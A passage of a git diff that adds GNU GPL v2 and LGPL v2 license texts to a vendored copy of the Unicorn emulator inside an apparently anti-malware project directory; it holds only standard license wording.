a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. diff --git a/ai_anti_malware/unicorn/unicorn-master/COPYING.LGPL2 b/ai_anti_malware/unicorn/unicorn-master/COPYING.LGPL2 new file mode 100644 index 0000000..5bc8fb2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/COPYING.LGPL2 @@ -0,0 +1,481 @@ + GNU LIBRARY GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1991 Free Software Foundation, Inc. + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + +[This is the first released version of the library GPL. It is + numbered 2 because it goes with version 2 of the ordinary GPL.] + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +Licenses are intended to guarantee your freedom to share and change +free software--to make sure the software is free for all its users. + + This license, the Library General Public License, applies to some +specially designated Free Software Foundation software, and to any +other libraries whose authors decide to use it. You can use it for +your libraries, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if +you distribute copies of the library, or if you modify it. + + For example, if you distribute copies of the library, whether gratis +or for a fee, you must give the recipients all the rights that we gave +you. You must make sure that they, too, receive or can get the source +code. If you link a program with the library, you must provide +complete object files to the recipients so that they can relink them +with the library, after making changes to the library and recompiling +it. And you must show them these terms so they know their rights. + + Our method of protecting your rights has two steps: (1) copyright +the library, and (2) offer you this license which gives you legal +permission to copy, distribute and/or modify the library. + + Also, for each distributor's protection, we want to make certain +that everyone understands that there is no warranty for this free +library. If the library is modified by someone else and passed on, we +want its recipients to know that what they have is not the original +version, so that any problems introduced by others will not reflect on +the original authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that companies distributing free +software will individually obtain patent licenses, thus in effect +transforming the program into proprietary software. To prevent this, +we have made it clear that any patent must be licensed for everyone's +free use or not licensed at all. + + Most GNU software, including some libraries, is covered by the ordinary +GNU General Public License, which was designed for utility programs. This +license, the GNU Library General Public License, applies to certain +designated libraries. This license is quite different from the ordinary +one; be sure to read it in full, and don't assume that anything in it is +the same as in the ordinary license. + + The reason we have a separate public license for some libraries is that +they blur the distinction we usually make between modifying or adding to a +program and simply using it. Linking a program with a library, without +changing the library, is in some sense simply using the library, and is +analogous to running a utility program or application program. However, in +a textual and legal sense, the linked executable is a combined work, a +derivative of the original library, and the ordinary General Public License +treats it as such. + + Because of this blurred distinction, using the ordinary General +Public License for libraries did not effectively promote software +sharing, because most developers did not use the libraries. We +concluded that weaker conditions might promote sharing better. + + However, unrestricted linking of non-free programs would deprive the +users of those programs of all benefit from the free status of the +libraries themselves. This Library General Public License is intended to +permit developers of non-free programs to use free libraries, while +preserving your freedom as a user of such programs to change the free +libraries that are incorporated in them. (We have not seen how to achieve +this as regards changes in header files, but we have achieved it as regards +changes in the actual functions of the Library.) The hope is that this +will lead to faster development of free libraries. + + The precise terms and conditions for copying, distribution and +modification follow. Pay close attention to the difference between a +"work based on the library" and a "work that uses the library". The +former contains code derived from the library, while the latter only +works together with the library. + + Note that it is possible for a library to be covered by the ordinary +General Public License rather than by this special one. + + GNU LIBRARY GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License Agreement applies to any software library which +contains a notice placed by the copyright holder or other authorized +party saying it may be distributed under the terms of this Library +General Public License (also called "this License"). Each licensee is +addressed as "you". + + A "library" means a collection of software functions and/or data +prepared so as to be conveniently linked with application programs +(which use some of those functions and data) to form executables. + + The "Library", below, refers to any such software library or work +which has been distributed under these terms. A "work based on the +Library" means either the Library or any derivative work under +copyright law: that is to say, a work containing the Library or a +portion of it, either verbatim or with modifications and/or translated +straightforwardly into another language. (Hereinafter, translation is +included without limitation in the term "modification".) + + "Source code" for a work means the preferred form of the work for +making modifications to it. For a library, complete source code means +all the source code for all modules it contains, plus any associated +interface definition files, plus the scripts used to control compilation +and installation of the library. + + Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running a program using the Library is not restricted, and output from +such a program is covered only if its contents constitute a work based +on the Library (independent of the use of the Library in a tool for +writing it). Whether that is true depends on what the Library does +and what the program that uses the Library does. + + 1. You may copy and distribute verbatim copies of the Library's +complete source code as you receive it, in any medium, provided that +you conspicuously and appropriately publish on each copy an +appropriate copyright notice and disclaimer of warranty; keep intact +all the notices that refer to this License and to the absence of any +warranty; and distribute a copy of this License along with the +Library. + + You may charge a fee for the physical act of transferring a copy, +and you may at your option offer warranty protection in exchange for a +fee. + + 2. You may modify your copy or copies of the Library or any portion +of it, thus forming a work based on the Library, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) The modified work must itself be a software library. + + b) You must cause the files modified to carry prominent notices + stating that you changed the files and the date of any change. + + c) You must cause the whole of the work to be licensed at no + charge to all third parties under the terms of this License. + + d) If a facility in the modified Library refers to a function or a + table of data to be supplied by an application program that uses + the facility, other than as an argument passed when the facility + is invoked, then you must make a good faith effort to ensure that, + in the event an application does not supply such function or + table, the facility still operates, and performs whatever part of + its purpose remains meaningful. + + (For example, a function in a library to compute square roots has + a purpose that is entirely well-defined independent of the + application. Therefore, Subsection 2d requires that any + application-supplied function or table used by this function must + be optional: if the application does not supply it, the square + root function must still compute square roots.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Library, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Library, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote +it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Library. + +In addition, mere aggregation of another work not based on the Library +with the Library (or with a work based on the Library) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may opt to apply the terms of the ordinary GNU General Public +License instead of this License to a given copy of the Library. To do +this, you must alter all the notices that refer to this License, so +that they refer to the ordinary GNU General Public License, version 2, +instead of to this License. (If a newer version than version 2 of the +ordinary GNU General Public License has appeared, then you can specify +that version instead if you wish.) Do not make any other change in +these notices. + + Once this change is made in a given copy, it is irreversible for +that copy, so the ordinary GNU General Public License applies to all +subsequent copies and derivative works made from that copy. + + This option is useful when you wish to copy part of the code of +the Library into a program that is not a library. + + 4. You may copy and distribute the Library (or a portion or +derivative of it, under Section 2) in object code or executable form +under the terms of Sections 1 and 2 above provided that you accompany +it with the complete corresponding machine-readable source code, which +must be distributed under the terms of Sections 1 and 2 above on a +medium customarily used for software interchange. + + If distribution of object code is made by offering access to copy +from a designated place, then offering equivalent access to copy the +source code from the same place satisfies the requirement to +distribute the source code, even though third parties are not +compelled to copy the source along with the object code. + + 5. A program that contains no derivative of any portion of the +Library, but is designed to work with the Library by being compiled or +linked with it, is called a "work that uses the Library". Such a +work, in isolation, is not a derivative work of the Library, and +therefore falls outside the scope of this License. + + However, linking a "work that uses the Library" with the Library +creates an executable that is a derivative of the Library (because it +contains portions of the Library), rather than a "work that uses the +library". The executable is therefore covered by this License. +Section 6 states terms for distribution of such executables. + + When a "work that uses the Library" uses material from a header file +that is part of the Library, the object code for the work may be a +derivative work of the Library even though the source code is not. +Whether this is true is especially significant if the work can be +linked without the Library, or if the work is itself a library. The +threshold for this to be true is not precisely defined by law. + + If such an object file uses only numerical parameters, data +structure layouts and accessors, and small macros and small inline +functions (ten lines or less in length), then the use of the object +file is unrestricted, regardless of whether it is legally a derivative +work. (Executables containing this object code plus portions of the +Library will still fall under Section 6.) + + Otherwise, if the work is a derivative of the Library, you may +distribute the object code for the work under the terms of Section 6. +Any executables containing that work also fall under Section 6, +whether or not they are linked directly with the Library itself. + + 6. As an exception to the Sections above, you may also compile or +link a "work that uses the Library" with the Library to produce a +work containing portions of the Library, and distribute that work +under terms of your choice, provided that the terms permit +modification of the work for the customer's own use and reverse +engineering for debugging such modifications. + + You must give prominent notice with each copy of the work that the +Library is used in it and that the Library and its use are covered by +this License. You must supply a copy of this License. If the work +during execution displays copyright notices, you must include the +copyright notice for the Library among them, as well as a reference +directing the user to the copy of this License. Also, you must do one +of these things: + + a) Accompany the work with the complete corresponding + machine-readable source code for the Library including whatever + changes were used in the work (which must be distributed under + Sections 1 and 2 above); and, if the work is an executable linked + with the Library, with the complete machine-readable "work that + uses the Library", as object code and/or source code, so that the + user can modify the Library and then relink to produce a modified + executable containing the modified Library. (It is understood + that the user who changes the contents of definitions files in the + Library will not necessarily be able to recompile the application + to use the modified definitions.) + + b) Accompany the work with a written offer, valid for at + least three years, to give the same user the materials + specified in Subsection 6a, above, for a charge no more + than the cost of performing this distribution. + + c) If distribution of the work is made by offering access to copy + from a designated place, offer equivalent access to copy the above + specified materials from the same place. + + d) Verify that the user has already received a copy of these + materials or that you have already sent this user a copy. + + For an executable, the required form of the "work that uses the +Library" must include any data and utility programs needed for +reproducing the executable from it. However, as a special exception, +the source code distributed need not include anything that is normally +distributed (in either source or binary form) with the major +components (compiler, kernel, and so on) of the operating system on +which the executable runs, unless that component itself accompanies +the executable. + + It may happen that this requirement contradicts the license +restrictions of other proprietary libraries that do not normally +accompany the operating system. Such a contradiction means you cannot +use both them and the Library together in an executable that you +distribute. + + 7. You may place library facilities that are a work based on the +Library side-by-side in a single library together with other library +facilities not covered by this License, and distribute such a combined +library, provided that the separate distribution of the work based on +the Library and of the other library facilities is otherwise +permitted, and provided that you do these two things: + + a) Accompany the combined library with a copy of the same work + based on the Library, uncombined with any other library + facilities. This must be distributed under the terms of the + Sections above. + + b) Give prominent notice with the combined library of the fact + that part of it is a work based on the Library, and explaining + where to find the accompanying uncombined form of the same work. + + 8. You may not copy, modify, sublicense, link with, or distribute +the Library except as expressly provided under this License. Any +attempt otherwise to copy, modify, sublicense, link with, or +distribute the Library is void, and will automatically terminate your +rights under this License. However, parties who have received copies, +or rights, from you under this License will not have their licenses +terminated so long as such parties remain in full compliance. + + 9. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Library or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Library (or any work based on the +Library), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Library or works based on it. + + 10. Each time you redistribute the Library (or any work based on the +Library), the recipient automatically receives a license from the +original licensor to copy, distribute, link with or modify the Library +subject to these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 11. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Library at all. For example, if a patent +license would not permit royalty-free redistribution of the Library by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Library. + +If any portion of this section is held invalid or unenforceable under any +particular circumstance, the balance of the section is intended to apply, +and the section as a whole is intended to apply in other circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 12. If the distribution and/or use of the Library is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Library under this License may add +an explicit geographical distribution limitation excluding those countries, +so that distribution is permitted only in or among countries not thus +excluded. In such case, this License incorporates the limitation as if +written in the body of this License. + + 13. The Free Software Foundation may publish revised and/or new +versions of the Library General Public License from time to time. +Such new versions will be similar in spirit to the present version, +but may differ in detail to address new problems or concerns. + +Each version is given a distinguishing version number. If the Library +specifies a version number of this License which applies to it and +"any later version", you have the option of following the terms and +conditions either of that version or of any later version published by +the Free Software Foundation. If the Library does not specify a +license version number, you may choose any version ever published by +the Free Software Foundation. + + 14. If you wish to incorporate parts of the Library into other free +programs whose distribution conditions are incompatible with these, +write to the author to ask for permission. For software which is +copyrighted by the Free Software Foundation, write to the Free +Software Foundation; we sometimes make exceptions for this. Our +decision will be guided by the two goals of preserving the free status +of all derivatives of our free software and of promoting the sharing +and reuse of software generally. + + NO WARRANTY + + 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO +WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. +EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR +OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY +KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE +LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME +THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN +WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY +AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU +FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR +CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE +LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING +RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A +FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF +SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH +DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Libraries + + If you develop a new library, and you want it to be of the greatest +possible use to the public, we recommend making it free software that +everyone can redistribute and change. You can do so by permitting +redistribution under these terms (or, alternatively, under the terms of the +ordinary General Public License). + + To apply these terms, attach the following notices to the library. It is +safest to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least the +"copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Library General Public + License as published by the Free Software Foundation; either + version 2 of the License, or (at your option) any later version. + + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Library General Public License for more details. + + You should have received a copy of the GNU Library General Public + License along with this library; if not, write to the Free Software + Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + +Also add information on how to contact you by electronic and paper mail. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the library, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the + library `Frob' (a library for tweaking knobs) written by James Random Hacker. + + , 1 April 1990 + Ty Coon, President of Vice + +That's all there is to it! diff --git a/ai_anti_malware/unicorn/unicorn-master/COPYING_GLIB b/ai_anti_malware/unicorn/unicorn-master/COPYING_GLIB new file mode 100644 index 0000000..bf50f20 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/COPYING_GLIB @@ -0,0 +1,482 @@ + GNU LIBRARY GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1991 Free Software Foundation, Inc. + 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + +[This is the first released version of the library GPL. It is + numbered 2 because it goes with version 2 of the ordinary GPL.] + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +Licenses are intended to guarantee your freedom to share and change +free software--to make sure the software is free for all its users. + + This license, the Library General Public License, applies to some +specially designated Free Software Foundation software, and to any +other libraries whose authors decide to use it. You can use it for +your libraries, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if +you distribute copies of the library, or if you modify it. + + For example, if you distribute copies of the library, whether gratis +or for a fee, you must give the recipients all the rights that we gave +you. You must make sure that they, too, receive or can get the source +code. If you link a program with the library, you must provide +complete object files to the recipients so that they can relink them +with the library, after making changes to the library and recompiling +it. And you must show them these terms so they know their rights. + + Our method of protecting your rights has two steps: (1) copyright +the library, and (2) offer you this license which gives you legal +permission to copy, distribute and/or modify the library. + + Also, for each distributor's protection, we want to make certain +that everyone understands that there is no warranty for this free +library. If the library is modified by someone else and passed on, we +want its recipients to know that what they have is not the original +version, so that any problems introduced by others will not reflect on +the original authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that companies distributing free +software will individually obtain patent licenses, thus in effect +transforming the program into proprietary software. To prevent this, +we have made it clear that any patent must be licensed for everyone's +free use or not licensed at all. + + Most GNU software, including some libraries, is covered by the ordinary +GNU General Public License, which was designed for utility programs. This +license, the GNU Library General Public License, applies to certain +designated libraries. This license is quite different from the ordinary +one; be sure to read it in full, and don't assume that anything in it is +the same as in the ordinary license. + + The reason we have a separate public license for some libraries is that +they blur the distinction we usually make between modifying or adding to a +program and simply using it. Linking a program with a library, without +changing the library, is in some sense simply using the library, and is +analogous to running a utility program or application program. However, in +a textual and legal sense, the linked executable is a combined work, a +derivative of the original library, and the ordinary General Public License +treats it as such. + + Because of this blurred distinction, using the ordinary General +Public License for libraries did not effectively promote software +sharing, because most developers did not use the libraries. We +concluded that weaker conditions might promote sharing better. + + However, unrestricted linking of non-free programs would deprive the +users of those programs of all benefit from the free status of the +libraries themselves. This Library General Public License is intended to +permit developers of non-free programs to use free libraries, while +preserving your freedom as a user of such programs to change the free +libraries that are incorporated in them. (We have not seen how to achieve +this as regards changes in header files, but we have achieved it as regards +changes in the actual functions of the Library.) The hope is that this +will lead to faster development of free libraries. + + The precise terms and conditions for copying, distribution and +modification follow. Pay close attention to the difference between a +"work based on the library" and a "work that uses the library". The +former contains code derived from the library, while the latter only +works together with the library. + + Note that it is possible for a library to be covered by the ordinary +General Public License rather than by this special one. + + GNU LIBRARY GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License Agreement applies to any software library which +contains a notice placed by the copyright holder or other authorized +party saying it may be distributed under the terms of this Library +General Public License (also called "this License"). Each licensee is +addressed as "you". + + A "library" means a collection of software functions and/or data +prepared so as to be conveniently linked with application programs +(which use some of those functions and data) to form executables. + + The "Library", below, refers to any such software library or work +which has been distributed under these terms. A "work based on the +Library" means either the Library or any derivative work under +copyright law: that is to say, a work containing the Library or a +portion of it, either verbatim or with modifications and/or translated +straightforwardly into another language. (Hereinafter, translation is +included without limitation in the term "modification".) + + "Source code" for a work means the preferred form of the work for +making modifications to it. For a library, complete source code means +all the source code for all modules it contains, plus any associated +interface definition files, plus the scripts used to control compilation +and installation of the library. + + Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running a program using the Library is not restricted, and output from +such a program is covered only if its contents constitute a work based +on the Library (independent of the use of the Library in a tool for +writing it). Whether that is true depends on what the Library does +and what the program that uses the Library does. + + 1. You may copy and distribute verbatim copies of the Library's +complete source code as you receive it, in any medium, provided that +you conspicuously and appropriately publish on each copy an +appropriate copyright notice and disclaimer of warranty; keep intact +all the notices that refer to this License and to the absence of any +warranty; and distribute a copy of this License along with the +Library. + + You may charge a fee for the physical act of transferring a copy, +and you may at your option offer warranty protection in exchange for a +fee. + + 2. You may modify your copy or copies of the Library or any portion +of it, thus forming a work based on the Library, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) The modified work must itself be a software library. + + b) You must cause the files modified to carry prominent notices + stating that you changed the files and the date of any change. + + c) You must cause the whole of the work to be licensed at no + charge to all third parties under the terms of this License. + + d) If a facility in the modified Library refers to a function or a + table of data to be supplied by an application program that uses + the facility, other than as an argument passed when the facility + is invoked, then you must make a good faith effort to ensure that, + in the event an application does not supply such function or + table, the facility still operates, and performs whatever part of + its purpose remains meaningful. + + (For example, a function in a library to compute square roots has + a purpose that is entirely well-defined independent of the + application. Therefore, Subsection 2d requires that any + application-supplied function or table used by this function must + be optional: if the application does not supply it, the square + root function must still compute square roots.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Library, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Library, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote +it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Library. + +In addition, mere aggregation of another work not based on the Library +with the Library (or with a work based on the Library) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may opt to apply the terms of the ordinary GNU General Public +License instead of this License to a given copy of the Library. To do +this, you must alter all the notices that refer to this License, so +that they refer to the ordinary GNU General Public License, version 2, +instead of to this License. (If a newer version than version 2 of the +ordinary GNU General Public License has appeared, then you can specify +that version instead if you wish.) Do not make any other change in +these notices. + + Once this change is made in a given copy, it is irreversible for +that copy, so the ordinary GNU General Public License applies to all +subsequent copies and derivative works made from that copy. + + This option is useful when you wish to copy part of the code of +the Library into a program that is not a library. + + 4. You may copy and distribute the Library (or a portion or +derivative of it, under Section 2) in object code or executable form +under the terms of Sections 1 and 2 above provided that you accompany +it with the 